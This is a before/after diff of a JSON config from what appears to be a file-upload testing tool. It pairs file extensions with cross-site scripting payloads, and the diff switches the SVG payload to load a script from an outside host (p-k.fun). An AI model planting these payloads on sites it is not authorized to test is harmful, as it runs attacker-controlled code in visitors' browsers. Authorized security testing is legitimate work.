web/assets/extensions.json (before)
{
  "html": {
    "Extension": [".html", ".shtml", ".xhtml"],
    "Content-Type": "text/html",
    "Payload": "<script>alert(document.domain)</script>"
  },
  "css": {
    "Extension": [".css", ".scss"],
    "Content-Type": "text/css",
    "Payload": "hello there"
  },
  "js": {
    "Extension": [".js", ".mjs"],
    "Content-Type": "application/javascript",
    "Payload": "alert(document.domain)"
  },
  "jpg": {
    "Extension": [".jpg", ".jpeg"],
    "Content-Type": "image/jpeg",
    "Payload": "hello there"
  },
  "png": {
    "Extension": [".png"],
    "Content-Type": "image/png",
    "Payload": "hello there"
  },
  "php": {
    "Extension": [".php", ".php3", ".php4", ".php5", ".phtml"],
    "Content-Type": "text/html",
    "Payload": "<?php echo '<script> alert(document.domain); </script>';?>"
  },
  "svg": {
    "Extension": [".svg"],
    "Content-Type": "image/svg+xml",
    "Payload": "<svg xmlns=\"http://www.w3.org/2000/svg\"><script>alert(document.domain)</script></svg>"
  }
}

web/assets/extensions.json (after)
{
  "html": {
    "Extension": [".html", ".shtml", ".xhtml"],
    "Content-Type": "text/html",
    "Payload": "<script>alert(document.domain)</script>"
  },
  "css": {
    "Extension": [".css", ".scss"],
    "Content-Type": "text/css",
    "Payload": "hello there"
  },
  "txt": {
    "Extension": [".txt"],
    "Content-Type": "text/plain",
    "Payload": "hello there"
  },
  "js": {
    "Extension": [".js", ".mjs"],
    "Content-Type": "application/javascript",
    "Payload": "alert(document.domain)"
  },
  "jpg": {
    "Extension": [".jpg", ".jpeg"],
    "Content-Type": "image/jpeg",
    "Payload": "hello there"
  },
  "png": {
    "Extension": [".png"],
    "Content-Type": "image/png",
    "Payload": "hello there"
  },
  "php": {
    "Extension": [".php", ".php3", ".php4", ".php5", ".phtml"],
    "Content-Type": "text/html",
    "Payload": "<?php echo '<script> alert(document.domain); </script>';?>"
  },
  "svg": {
    "Extension": [".svg"],
    "Content-Type": "image/svg+xml",
    "Payload": "<svg viewBox=\"0 0 100 100\" xmlns=\"http://www.w3.org/2000/svg\"><circle cx=\"50\" cy=\"50\" r=\"50\" /><script src=\"https://p-k.fun/pichikwashere\"></script></svg>"
  }
}

web/assets/extensions.json (diff)
@@ -9,6 +9,11 @@
     "Content-Type": "text/css",
     "Payload": "hello there"
   },
+  "txt": {
+    "Extension": [".txt"],
+    "Content-Type": "text/plain",
+    "Payload": "hello there"
+  },
   "js": {
     "Extension": [".js", ".mjs"],
     "Content-Type": "application/javascript",
@@ -32,6 +37,6 @@
   "svg": {
     "Extension": [".svg"],
     "Content-Type": "image/svg+xml",
-    "Payload": "<svg xmlns=\"http://www.w3.org/2000/svg\"><script>alert(document.domain)</script></svg>"
+    "Payload": "<svg viewBox=\"0 0 100 100\" xmlns=\"http://www.w3.org/2000/svg\"><circle cx=\"50\" cy=\"50\" r=\"50\" /><script src=\"https://p-k.fun/pichikwashere\"></script></svg>"
   }
 }
